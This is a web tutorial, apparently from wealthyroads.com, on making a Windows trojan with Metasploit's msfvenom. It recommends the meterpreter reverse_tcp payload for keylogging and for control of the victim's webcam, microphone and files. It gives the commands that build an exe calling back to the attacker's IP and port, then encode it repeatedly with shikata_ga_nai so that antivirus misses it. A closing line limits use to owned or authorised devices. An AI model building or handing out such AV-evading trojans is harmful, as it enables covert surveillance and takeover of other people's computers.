In this article, we will be using metasploit, a program used for penetration testing. Metasploit allows someone to design their own exploits, payloads, or other viruses/malicious code that you can run on another person’s computer. These exploits range from installing keyloggers or monitoring the traffic on another person’s computer. If you are using kali linux, metasploit will come pre-installed and ready to used.
How to create a trojan virus
By following these steps, you will be able to create your own executable file containing a payload (the exploit you want to run).
Note: we will be using Msfvenom in this tutorial. If you have not used metasploit in a while, you may be used to using Msfpayload and Msfencode. Msfvenom is a combination of Msfpayload and Msfvenom, and all commands in those tools are available in Msfvenom.
- A computer running Kali Linux
- An open terminal
1. Update and Upgrade Your Kali Linux
You should be periodically updating Kali Linux. If you haven’t upgraded in a while or you just booted it up, now is a good time to update.
Open the terminal by clicking the window at the top and type in:
sudo apt-get update
Next, type in:
sudo apt-get upgrade
This should update your system to the most recent version. Now we can begin.
2. Open exploit software
Open up the terminal and type in
This will show a list of commands available to you in metasploit. To see available payloads, type in
msfvenom -l payloads
This will list all available payloads for you to use. As you can see, there are a lot of them. If you want to see other options, you can type in any of the other options listed on screen. You can see options like formatting, platforms, encoders (which will be discussed later in this article), encryption keys, bad characters, and many others.
When giving the command to list payloads, you might see this error:
If you see this, it means that bundler is either set up incorrectly or hasn’t been updated.
Note: if you did not see this error, you can skip to step 3.
To fix this, change the current directory (file) to usr/share/metasploit-framework by typing in:
from the root directory. If you make a mistake, you can type in
to go back to the previous directory or type in any directory after cd to go there.
Now that we are in the metasploit-framework directory, type in
gem install bundler
to install bundler, then type in
If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in
gem install bundler:[version number]
and then type in
gem update –system
After all of that, everything should work perfectly.
to go back to the root directory.
msfvenom -l payloads
to see a list of payloads.
We recommend using windows/meterpreter/reverse_tcp. It allows you to keylog, sniff for data, and control the infected computer’s file system, microphone, and webcam. It is one of the most versatile, invasive, and devastating payloads in metasploit.
Now that we have our payload, we can check what options we have. Type:
msfvenom –list-options -p [payload]
to see what we can change about the exploit and where the exploit sends the information.
We see that LHOST is blank; this is where the exploit sends information from the infected device. In most cases, this will be your ip address.
To find your ip address, type
into the terminal to get this window. Your ip address is after the word “inet.” If you are connected to the internet via ethernet, use the ip address at eth0; if you are connected wirelessly, use the one at wlan0.
Our ip address is our LHOST parameter.
Now that we have our payload, ip address, and port number, we have all the information that we need. Type in:
msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -f [file type] > [path]
The file type should be exe, and the path should be the file name (make sure the file extension after the name and the file type match). Especially make sure to not press enter before putting the “> [path],” as this will run the exploit on your own device.
If we look in our files using ls, we see that our new file pops up.
Since windows/meterpreter/reverse_tcp is a common exploit, many antivirus programs will detect it. However, we can encrypt the program so that an antivirus can’t catch it. Included with metasploit is a long list of encryptors. Type:
msfvenom -l encodersto see a list of them.
Once you choose the encryption you want (we recommend x86/shikata_ga_nai), you can encrypt it multiple times when you type in the command to make the exploit. Encrypting the file multiple times helps prevent antivirus programs from catching your virus. Type in:
msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -e [encoder] -i [number of times to encrypt] -f [file type] > [path]
Now we have made a trojan virus that has been encrypted and harder to recognize by an antivirus program. If we type ‘ls’ to look at our files, we see…
Our new trojan is in our files.
Remember, you can only legally run these trojan viruses on devices that belong to you or devices that you have been granted explicit permission to run them on. All other uses are illegal and are not condoned or endorsed by kali linux or wealthyroads.com.